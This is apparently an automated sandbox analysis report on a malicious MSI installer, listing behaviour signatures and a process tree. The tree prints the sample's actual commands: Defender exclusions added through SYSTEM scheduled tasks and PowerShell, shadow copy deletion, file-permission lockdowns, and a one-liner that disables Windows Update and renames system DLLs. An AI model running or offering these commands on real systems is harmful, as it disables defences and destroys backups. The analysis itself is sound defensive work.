Analysis

  • max time kernel
    139s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    02/08/2026, 03:04

General

  • Target
    install_s0up006.msi
  • Size 7.6MB
  • Sample260802-dkpdqscc96
  • SHA256 0f222defec009c65ff1d41ceff228c4f3c5ab9f7f3877724801729ba6f6275bb
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 18 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 7 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 2 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 29 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_s0up006.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4000
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2000
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4712
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding B62958FA47BAFAF202AA925B2CA1AD1E E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:4436
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:4404
  • C:\Users\Public\CA3JTe\KypqmH.exe
    C:\Users\Public\CA3JTe\KypqmH.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4328
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\CA3JTe\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\CA3JTe\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3808
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:1424
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:4260
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:616
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1012
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:4116
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:1652
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:4160
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3876
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:1192
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:876
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:4460
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:612
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:1340
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:1636
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:3828
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:4436
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:4636
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:4000
                        • C:\Program Files (x86)\Dpt9ZI\Dpt9ZI.exe
                          "C:\Program Files (x86)\Dpt9ZI\Dpt9ZI.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:4632
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            PID:2844
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:724
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\Dpt9ZI" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:1996
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2596
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:1748
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4228
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3700
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\Dpt9ZI" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:2904
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:1248
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\Dpt9ZI" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:1016
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI\Dpt9ZI.exe" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:2988
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\Dpt9ZI\Dpt9ZI.exe" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:876
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI\Dpt9ZI.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4928
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\Dpt9ZI\Dpt9ZI.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:4964
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI\Dpt9ZI.exe" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3288
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\Dpt9ZI\Dpt9ZI.exe" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:2272
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI\image.png" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:1340
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\Dpt9ZI\image.png" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:1492
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:728
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\Dpt9ZI\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:412
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI\image.png" /grant:r Users:(RX) /deny Users:(DE)
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3984
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\Dpt9ZI\image.png" /grant:r Users:(RX) /deny Users:(DE)
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:2816
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI\thumbs.db" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:4704
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              4⤵
                                PID:2844
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\Dpt9ZI\thumbs.db" /inheritance:r
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:3772
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              3⤵
                              • Executes a command shell one-liner
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:2396
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\Dpt9ZI\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:2296
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                              3⤵
                              • Executes a command shell one-liner
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:1456
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\Dpt9ZI\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:5044
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI\XPSPLOG.dll" /inheritance:r
                              3⤵
                              • Executes a command shell one-liner
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:1468
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\Dpt9ZI\XPSPLOG.dll" /inheritance:r
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:1748
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              3⤵
                              • Executes a command shell one-liner
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:844
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\Dpt9ZI\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:1428
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\Dpt9ZI\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                              3⤵
                              • Executes a command shell one-liner
                              • Suspicious use of WriteProcessMemory
                              PID:2132
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\Dpt9ZI\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:3076
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)' -Force
                              3⤵
                              • Command and Scripting Interpreter: PowerShell
                              • System Location Discovery: System Language Discovery
                              PID:2152
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\Dpt9ZI\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                              3⤵
                              • Indicator Removal: Clear Persistence
                              • System Location Discovery: System Language Discovery
                              PID:4908
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\Dpt9ZI\" /t REG_DWORD /d 0 /f"
                                4⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:4948
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Run /TN "Task1"
                                4⤵
                                  PID:3420
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2124
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:3304
                                • C:\Windows\SysWOW64\net.exe
                                  net stop wuauserv
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3176
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop wuauserv
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2268
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config wuauserv start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  PID:4712
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure wuauserv reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  PID:2304
                                • C:\Windows\SysWOW64\net.exe
                                  net stop UsoSvc
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1688
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop UsoSvc
                                    5⤵
                                      PID:1252
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config UsoSvc start= disabled
                                    4⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:4608
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc failure UsoSvc reset= 0 actions= ""
                                    4⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:3908
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop uhssvc
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:952
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop uhssvc
                                      5⤵
                                        PID:4772
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config uhssvc start= disabled
                                      4⤵
                                      • Launches sc.exe
                                      PID:2452
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc failure uhssvc reset= 0 actions= ""
                                      4⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:2964
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop WaaSMedicSvc
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2804
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop WaaSMedicSvc
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4336
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config WaaSMedicSvc start= disabled
                                      4⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:2256
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc failure WaaSMedicSvc reset= 0 actions= ""
                                      4⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:2912
                                    • C:\Windows\SysWOW64\takeown.exe
                                      takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:3808
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:800
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:4600
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:3400
                                    • C:\Windows\SysWOW64\takeown.exe
                                      takeown /f C:\Windows\System32\wuaueng.dll
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:1820
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:1748
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:1412
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:3204
                                    • C:\Windows\SysWOW64\reg.exe
